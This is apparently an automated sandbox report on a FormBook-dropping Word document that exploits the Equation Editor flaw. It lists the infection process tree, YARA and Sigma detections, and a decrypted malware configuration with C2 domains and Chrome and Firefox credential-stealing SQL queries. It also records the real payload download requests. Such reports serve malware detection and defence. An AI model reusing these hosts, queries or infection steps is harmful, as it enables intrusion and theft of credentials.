Loading ...

Play interactive tourEdit tour

Analysis Report IMG-50230.doc

Overview

General Information

Sample Name:IMG-50230.doc
Analysis ID:344787
MD5:447225e0d19daba3ebaa394a72b72318
SHA1:ade2804cac4b052d9fb2af635dd2b7e4dd960853
SHA256:39e2a7aebe3542b3caf9fca72de467f409766056a29923042ec91c5140503409
Tags:doc

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AntiVM_3
Yara detected FormBook
Allocates memory in foreign processes
Connects to a URL shortener service
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2112 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2232 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • 69577.exe (PID: 2536 cmdline: C:\Users\Public\69577.exe MD5: BEB09E991A41577E79DFABC58178A44F)
      • AddInProcess32.exe (PID: 2688 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: DA55A7AED2F65D6104E1A79EE067CC00)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • rundll32.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • cmd.exe (PID: 1980 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc6", "KEY1_OFFSET 0x1d737", "CONFIG SIZE : 0x103", "CONFIG OFFSET 0x1d83b", "URL SIZE : 35", "searching string pattern", "strings_offset 0x1c383", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x964e9058", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715032", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012162", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014d5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "motherdairysfranchise.com", "realhomeincest.com", "unclebal.info", "1039995.com", "getdiscoveryplus.com", "beingsupermommy.com", "frfcentre.com", "shelterislandbeachwear.com", "rangers3.xyz", "hotlinebus.com", "lojailymodas.com", "profille-edwena67marilynn.club", "owe.pink", "sorenohotel.com", "keller-minimal-windows.com", "lujanlimo.com", "whitefeathercleaning.com", "superpay.info", "elmtreecottage.com", "shmoop.club", "shortflagsuniverse.com", "xingfulujing.com", "promotwins.com", "ae993.com", "kevinhammer.net", "protivafiber.com", "ahmetcanhoca.com", "economist.sucks", "fokusummat.com", "visitkaaba.com", "minilemons.com", "vaginalcosmetic.com", "healthmeetsyou.com", "khanhvps.design", "nekotsuki.net", "gloryexperiencemedia.com", "matutinao.com", "storytool256.com", "luhhulie.com", "vnhayrxu.icu", "ministerioriosdegloria.com", "whistleblowernewsnetwork.net", "african-sound.com", "quilometrezero.online", "febird.info", "sellkenoshacounty.com", "saiparahnama.com", "healthynailz.com", "foundershuddle.com", "bycaqar.com", "purpleandpinkstore.com", "forbiddenfeet.com", "saplingsenglishmediumschool.com", "bakebakeys.com", "xn--th-xma.com", "belovedllc.com", "rlgfactory.com", "wearablefantasy.com", "hxlw55.com", "bew67zp4f4ty5.net", "lateliersignature.com", "laok520.com", "hemitea.com", "treasurecoastmortgages.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.wirelesschargerkings.com/zrmt/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x88e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x957a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a507:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x17429:$sqlite3step: 68 34 1C 7B E1
    • 0x1753c:$sqlite3step: 68 34 1C 7B E1
    • 0x17458:$sqlite3text: 68 38 2A 90 C5
    • 0x1757d:$sqlite3text: 68 38 2A 90 C5
    • 0x1746b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17593:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 14 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.AddInProcess32.exe.80000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.AddInProcess32.exe.80000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.AddInProcess32.exe.80000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17629:$sqlite3step: 68 34 1C 7B E1
        • 0x1773c:$sqlite3step: 68 34 1C 7B E1
        • 0x17658:$sqlite3text: 68 38 2A 90 C5
        • 0x1777d:$sqlite3text: 68 38 2A 90 C5
        • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17793:$sqlite3blob: 68 53 D8 7F 8C

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2232, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2536
        Sigma detected: EQNEDT32.EXE connecting to internetShow sources
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 67.199.248.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2232, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2232, TargetFilename: C:\Users\Public\69577.exe
        Sigma detected: Executables Started in Suspicious FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2232, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2536
        Sigma detected: Execution in Non-Executable FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2232, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2536
        Sigma detected: Suspicious Program Location Process StartsShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2232, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2536

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 5.2.AddInProcess32.exe.80000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc6", "KEY1_OFFSET 0x1d737", "CONFIG SIZE : 0x103", "CONFIG OFFSET 0x1d83b", "URL SIZE : 35", "searching string pattern", "strings_offset 0x1c383", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x964e9058", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715032", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012162", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014d5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04"
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-50230[1].pdfJoe Sandbox ML: detected
        Source: C:\Users\Public\69577.exeJoe Sandbox ML: detected
        Source: 5.2.AddInProcess32.exe.80000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exeJump to behavior
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

        Compliance:

        barindex
        Uses new MSVCR DllsShow sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Binary contains paths to debug symbolsShow sources
        Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe
        Source: Binary string: wntdll.pdb source: AddInProcess32.exe, rundll32.exe
        Source: Binary string: rundll32.pdb source: AddInProcess32.exe, 00000005.00000002.2140415734.00000000001C4000.00000004.00000020.sdmp
        Source: C:\Users\Public\69577.exeCode function: 4x nop then jmp 003AAFE3h4_2_003AA810
        Source: C:\Users\Public\69577.exeCode function: 4x nop then mov esp, ebp4_2_003AF99F
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi5_2_00097CEF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi7_2_000E7CEF
        Source: global trafficDNS query: name: bit.ly
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 67.199.248.11:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 67.199.248.11:80

        Networking:

        barindex
        Connects to a URL shortener serviceShow sources
        Source: unknownDNS query: name: bit.ly
        Source: unknownDNS query: name: bit.ly
        Source: Joe Sandbox ViewIP Address: 67.199.248.11 67.199.248.11
        Source: Joe Sandbox ViewASN Name: GOOGLE-PRIVATE-CLOUDUS GOOGLE-PRIVATE-CLOUDUS
        Source: global trafficHTTP traffic detected: GET /3iWebUT HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /3iWebUT HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cgi./IMG-50230.pdf HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: neuromedic.com.br
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{248D4A90-30CA-4646-ACFF-79FC9E14ADCB}.tmpJump to behavior
        Source: global trafficHTTP traffic detected: GET /3iWebUT HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /3iWebUT HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cgi./IMG-50230.pdf HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: neuromedic.com.br
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
